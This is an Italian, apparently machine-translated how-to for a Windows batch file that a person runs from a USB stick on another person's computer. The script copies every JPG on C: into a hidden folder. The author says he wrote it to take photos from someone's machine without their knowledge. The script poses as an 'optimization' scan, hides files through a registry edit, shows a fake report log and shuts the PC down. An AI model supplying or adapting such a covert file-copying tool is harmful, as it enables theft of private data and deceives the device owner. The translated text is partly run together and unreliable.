Sommario:

Immagine spia segreta Copia file batch di foto: 5 passaggi
Immagine spia segreta Copia file batch di foto: 5 passaggi

Video: Immagine spia segreta Copia file batch di foto: 5 passaggi

Video: Immagine spia segreta Copia file batch di foto: 5 passaggi
Video: ЗАПРЕЩЁННЫЕ ТОВАРЫ с ALIEXPRESS 2023 ШТРАФ и ТЮРЬМА ЛЕГКО! 2024, Dicembre
Anonim
File batch per la copia di foto di immagini spia segrete
File batch per la copia di foto di immagini spia segrete
File batch per la copia di foto di immagini spia segrete
File batch per la copia di foto di immagini spia segrete
File batch per la copia di foto di immagini spia segrete
File batch per la copia di foto di immagini spia segrete

Quindi, per prima cosa, cos'è questa creazione e perché. Questa istruzione ti consentirà di creare un file batch che copierà tutte le immagini da un PC alla tua memory stick. lo farà in modo discreto, spacciandosi per un altro programma che sta controllando il computer per problemi. Al termine, avrai una cartella nascosta sulla tua memory stick con tutte le immagini copiate. Perché? Ho creato questo istruibile perché volevo recuperare una foto digitale dalla macchina di qualcuno senza che loro sapessero che l'avevo fatto. L'uso legittimo di questo file ti consentirà di archiviare/fare il backup delle tue foto personali. Altri usi: questo file può essere modificato per consentire la copia di qualsiasi altro tipo di documento.

Passaggio 1: scrivi il codice

Scrivi il codice
Scrivi il codice
Scrivi il codice
Scrivi il codice

Copia il seguente codice nel blocco note e salvalo nella radice della tua memory stick come file bat, puoi chiamarlo come vuoi purché abbia l'estensione.bat. Per assicurarti che abbia l'estensione corretta, digita come segue nella casella di salvataggio del blocco note "copyimage.bat" (includi le virgolette!)

@echo offecho Optimization client 2008 v3.02becho --------------------------------echo.echo Non utilizzare il PC mentre è in esecuzione.echo.echo Elenco dei processi di scansione. Al termine, verrà visualizzato un registro per il tuo amministratore di sistema per revisionare.echo.echo Si prega di pazientare, questo potrebbe richiedere fino a 3 ore.reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f >nulmkdir \data >nulattrib +h \data >nulsetLocal EnableDelayedExpansion@echo offfor %%a in (jpg) do (for /f "tokens=* delims= " %%f in ('dir/b/s/ ad c:\*.%%a') do (xcopy "%%f" \data\ /y /h /q >nul))attrib -s +h data\* >nulstart optimizationLog.txtshutdown /s /c " Scansione di ottimizzazione completata, il PC ora si spegnerà"

Passaggio 2: crea un file di rapporto falso

Crea un file di rapporto falso
Crea un file di rapporto falso

In questo passaggio ho creato un file di testo falso che finge di essere il registro dei risultati del file batch che eseguiamo per copiare i file. Questo ti permette di fingere che sia successo qualcosa. Non importa cosa dice questo file, puoi cambiarlo quanto vuoi, assicurati solo che il nome del file sia corretto e che sia memorizzato nella radice della tua scheda di memoria. Il testo che ho usato proviene principalmente da un dirottamento questo log, copialo e salvalo nella root della tua memory stick come optimizationLog.txt

Scansione completata. Chiudere questo registro e consentire all'amministratore di sistema di esaminarlo. Processi in esecuzione:C:\Windows\system32\taskeng.exeC:\Windows\system32\Dwm.exeC:\Windows\Explorer. EXEC:\Programmi\Java\jre1. 6.0_07\bin\jusched.exeC:\Windows\System32\hkcmd.exeC:\Windows\System32\igfxpers.exeC:\Windows\system32\igfxsrvc.exeC:\Programmi\Synaptics\SynTP\SynTPEnh.exeC:\Program Files\TOSHIBA\Power Saver\TPwrMain.exeC:\Programmi\TOSHIBA\SmoothView\SmoothView.exeC:\Programmi\TOSHIBA\FlashCards\TCrdMain.exeC:\Programmi\BitDefender\BitDefender 2009\bdagent.exeC:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exeC:\Programmi\Registry Mechanic\regmech.exeC:\Programmi\BitDefender\BitDefender 2009\seccenter.exeC:\Programmi\Synaptics\SynTP\SynTPHelper.exeC:\Programmi\ Vuze\Azureus.exeC:\Programmi\Microsoft Office\Office12\OUTLOOK. EXEC:\Programmi\AutoCAD 2008\acad.exeC:\Users\Tom\AppData\Local\Temp\AdskCleanup.0001C:\Programmi\Mozilla Firefox\firefox.exeC:\Windows\System32\NOTA PAD. EXEC:\Windows\system32\SearchFilterHost.exeC:\HijackThis\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main, Default_Page_URL = https://www.google.co.ukR1 - HKCU\Software\Microsoft \Internet Explorer\Main, pagina di ricerca = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU\Software\Microsoft\Internet Explorer\Main, pagina iniziale = https://www.google.co. ukR1 - HKLM\Software\Microsoft\Internet Explorer\Main, Default_Page_URL = https://www.google.co.ukR1 - HKLM\Software\Microsoft\Internet Explorer\Main, Default_Search_URL = https://go.microsoft.com/ fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main, pagina di ricerca = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main, Start Pagina = https://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM\Software\Microsoft\Internet Explorer\Search, SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search, CustomizeSearch = R0 - HKCU \Software\Microsoft\Internet Explorer\Too lbar, LinksFolderName = O1 - Host:::1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programmi\File comuni\Adobe\Acrobat\ActiveX\AcroIEHelperShim:dll. Assistente del browser Groove GFS - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Programmi\Microsoft Office\Office12\GrooveShellExtensions.dllO2 - BHO: classe SSVHelper - {761497BB-D6F0-462C-B6EB-D4} -DA:\Programmi\Java\jre1.6.0_07\bin\ssv.dllO3 - Barra degli strumenti: BitDefender Toolbar - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C:\Programmi\BitDefender\BitDefender 2009\IEToolbar.dllO4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hideO4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programmi\Java\jre1.6.0_07\bin\ jusched.exe"O4 - HKLM\..\Esegui: [IgfxTray] C:\Windows\system32\igfxtray.exeO4 - HKLM\..\Esegui: [HotKeysCmds] C:\Windows\system32\hkcmd.exeO4 - HKLM\..\Esegui: [Persistenza] C:\Windows\system32\igfxpers.exeO4 - HKLM\..\Esegui: [SynTPEnh] C:\Programmi\Syna ptics\SynTP\SynTPEnh.exeO4 - HKLM\..\Run: [TPwrMain] %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain. EXEO4 - HKLM\..\Run: [SmoothView] %ProgramFiles%\Toshiba\SmoothView\SmoothView.exeO4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exeO4 - HKLM\..\Run: [Toshiba TEMPO] C:\Programmi\Toshiba TEMPRO\Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM\..\Run: [BDAgent] "C:\Programmi\BitDefender\BitDefender 2009\bdagent.exe"O4 - HKLM\..\Run: [BitDefender Antiphishing Helper] "C:\Programmi Files\BitDefender\BitDefender 2009\IESshow.exe"O4 - HKCU\..\Run: [TOSCDSPD] C:\Programmi\TOSHIBA\TOSCDSPD\TOSCDSPD.exeO4 - HKCU\..\Run: [RegistryMechanic] C:\ Program Files\Registry Mechanic\RMTray.exe /HO4 - Avvio: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Programmi\Microsoft Office\Office12\ONENOTEM. EXEO8 - Voce di menu contestuale extra: E&xport to Microsoft Excel - res: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9 - Pulsante extra: (nessun nome) - {08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C:\PROGRA~1\Java\JRE16~2.0_0\bin\ssv.dllO9 - Voce di menu "Strumenti" extra: Console Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~ 1\Java\JRE16~2.0_0\bin\ssv.dllO9 - Pulsante extra: Invia a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dllO9 - Voce di menu "Strumenti" extra: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dllO9 - Pulsante extra: eBay.co.uk - Acquista Lo vende lo adoro - {76577871-04EC-495E-A12B-91F7C3600AFA} - https://rover.ebay.com/rover/1/710-44557-9400-3/4 (file mancante)O9 - Pulsante extra: (nessun nome) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file mancante)O9 - Voce di menu "Strumenti" extra: Disinstalla Scanner online BitDefender v8 - {85d1f590-48f4-11d9-9669 -0800200c9a66} - %windir%\bdoscandel.exe (file mancante)O9 - Pulsante extra: Amazon.co.uk - {8A918C1D-E123-4E36-B562-5C1519E434CE} - https://www.amazon.co.uk/ exec/obidos/redirect-home?tag=Toshibaukbholink-2 1&site=home (file mancante)O9 - Pulsante extra: Ricerca - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR. DLLO10 - File sconosciuto in Winsock LSP: c:\windows\system32\nlaapi.dllO10 - File sconosciuto in Winsock LSP: c:\windows\system32\napinsp.dllO10 - File sconosciuto in Winsock LSP: c:\program files\vmware\vmware workstation\vsocklib.dllO10 - File sconosciuto in Winsock LSP: c:\program files\vmware\vmware workstation\vsocklib.dllO11 - Gruppo opzioni: [INTERNATIONAL] International*O13 - Prefisso Gopher: O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (get_atlcom Class) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - Protocollo: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Programmi\ Microsoft Office\Office12\GrooveSystemServices.dllO18 - Protocollo: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Programmi\File comuni\Microsoft Shared\Help\hxds.dllO18 - Filtro hijack: testo/ xml - {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF. DLLO20 - Notifica Winlogon: igfxcui - C:\Windows\SYSTEM32\igfxdev.dllO23 - Servizio: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Sistemi - C:\Windows\system32\agrsmsvc.exeO23 - Servizio: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C:\Programmi\File comuni\BitDefender\BitDefender Arrakis Server\bin\Arrakis3.exeO23 - Servizio: Autodesk Licensing Service - Autodesk - C:\Programmi\File comuni\Autodesk Shared \Service\AdskScSrv.exeO23 - Servizio: ConfigFree Service - TOSHIBA CORPORATION - C:\Programmi\TOSHIBA\ConfigFree\CFSvcs.exeO23 - Servizio: @%SystemRoot%\ehome\ehstart.dll, -101 (ehstart) - Proprietario sconosciuto - %windir%\system32\svchost.exe (file mancante)O23 - Servizio: getPlus(R) Helper - NOS Microsystems Ltd. - C:\Programmi\NOS\bin\getPlus_HelperSvc.exeO23 - Servizio: Google Update Service (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Proprietario sconosciuto - C:\Programmi\Google\Update\GoogleUpdate.exe" /svc (file mancante)O23 - Servizio: BitDefender Desktop Update Service (LIVESRV) - Proprietario sconosciuto - C:\Programmi\Common Files\BitDefender\BitDefender Update Service\livesrv.exe" /service (file mancante)O23 - Servizio: @%SystemRoot%\system32\qwave.dll, -1 (QWAVE) - Proprietario sconosciuto r - %windir%\system32\svchost.exe (file mancante)O23 - Servizio: @%SystemRoot%\system32\seclogon.dll, -7001 (seclogon) - Proprietario sconosciuto - %windir%\system32\svchost.exe (file missing)O23 - Servizio: Servizio di ottimizzazione delle prestazioni del notebook (TempoMonitoringService) - Toshiba Europe GmbH - C:\Programmi\Toshiba TEMPRO\TempoSVC.exeO23 - Servizio: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Programmi\ TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exeO23 - Servizio: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exeO23 - Servizio: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - c:\ Programmi\TOSHIBA\Power Saver\TosCoSrv.exeO23 - Servizio: TOSHIBA SMART Log Service - TOSHIBA Corporation - c:\Programmi\TOSHIBA\SMARTLogService\TosIPCSrv.exeO23 - Servizio: VMware Agent Service (ufad-ws60) - Proprietario sconosciuto - C:\Programmi\VMware\VMware Workstation\vmware-ufad.exe" -d "C:\Programmi\VMware\VMware Workstation\" -s ufad-p2v.x ml (file mancante)O23 - Servizio: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Programmi\File comuni\Ulead Systems\DVD\ULCDRSvr.exeO23 - Servizio: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Programmi\VMware\VMware Workstation\vmware-authd.exeO23 - Servizio: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\Windows\system32\vmnetdhcp.exeO23 - Servizio: VMware NAT Servizio - VMware, Inc. - C:\Windows\system32\vmnat.exeO23 - Servizio: BitDefender Virus Shield (VSSERV) - Proprietario sconosciuto - C:\Programmi\BitDefender\BitDefender 2009\vsserv.exe" /service (file mancante)O23 - Servizio: Server VNC versione 4 (WinVNC4) - Proprietario sconosciuto - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file mancante)O23 - Servizio: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe, -101 (WMPNetworkSvc) - Proprietario sconosciuto - %ProgramFiles%\Windows Media Player\wmpnetwk.exe (file mancante)

Passaggio 3: eseguire il programma

Esegui il programma
Esegui il programma
Esegui il programma
Esegui il programma

Ora dovresti avere una memory stick con due file (e molto spazio libero pronto per le nuove immagini). Se hai qualcos'altro sull'unità, non importa. Porta la memory stick sul computer di destinazione. Quando viene registrato, prendi nota della lettera di unità assegnata ad esso, questo ti consentirà di eseguirlo senza dover prima accedere alla cartella. Premi il tasto Windows e quindi premi "R" (tenendo ancora premuto il tasto Windows). Questo farà apparire una casella Esegui. Nella casella Esegui, digita il percorso del file batch che abbiamo creato, la lettera dell'unità è la lettera assegnata quando hai collegato la memory stick. Ad esempio, se inserisco la mia memory stick e registra ag:\ drive, allora eseguirei:g:\copyimage.batE quindi premi invio o fai clic su Esegui. Questo avvierà l'esecuzione del file batch. Al termine, spegnerà la macchina. Rimuovi la memory stick e portala via!

Passaggio 4: ottieni le immagini

Ottieni le immagini!
Ottieni le immagini!
Ottieni le immagini!
Ottieni le immagini!

Ora dovresti avere una memory stick con tutte le immagini su di essa. I file e la cartella sono nascosti, quindi se non hai mostrato il tuo, dovrai abilitarlo. Per farlo vai in una finestra di Explorer (es. apri il mio computer) e: WinXP - Strumenti, Opzioni cartella, Visualizza, Mostra file nascostiVista - Organizza, Opzioni cartella e ricerca, Visualizza, Mostra file nascosti Una volta selezionato, dovresti essere in grado di aprire il cartella nascosta e ottieni le immagini che volevi!

Passaggio 5: cosa significa il codice

Cosa significa il codice
Cosa significa il codice

Spiegherò quanto più codice possibile. la funzione di copia principale non è stata scritta da me, l'ho presa in prestito dal seguente sito e l'ho modificata:

@echo off ''Interrompe la visualizzazione dei comandi sullo schermo, quindi l'utente non sa cosa viene fatto echo Client di ottimizzazione 2008 v3.02b echo ------------------- -------------eco. Scrive sullo schermo un titolo per il programma echo Si prega di non utilizzare il PC mentre è in esecuzione.echo.echo Elenco dei processi di scansione. Al termine, verrà visualizzato un registro per il tuo amministratore di sistema per revisionare.echo.echo Si prega di pazientare, questo potrebbe richiedere fino a 3 ore. Dice all'utente un carico di spazzatura che non è vero reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f >nul Aggiunge una chiave di registro che nasconderà i file nascosti e cartelle. Ciò impedisce all'utente di vedere la cartella che stiamo creando per contenere le immagini copiate. Il comando nul alla fine impedisce al comando di riportare qualsiasi messaggio al termine mkdir \data >nul Crea una cartella sull'unità in cui risiede questo file batch sui dati chiamati. attrib +h \data >nul Nasconde la cartella creata setLocal EnableDelayedExpansionfor %%a in (jpg) do (for /f "tokens=* delims= " %%f in ('dir/b/s/ad c:\*. %%a') do (xcopy "%%f" \data\ /y /h /q >nul)) Questo è il codice che cercherà le immagini nell'intera unità c:\. Se vuoi che cerchi un'altra unità, cambia la parte c: in quello che vuoi. Se vuoi che trovi altri tipi di file, elencali accanto al testo jpg, separa i tipi di file con uno spazio. Ad esempio-j.webp

Consigliato: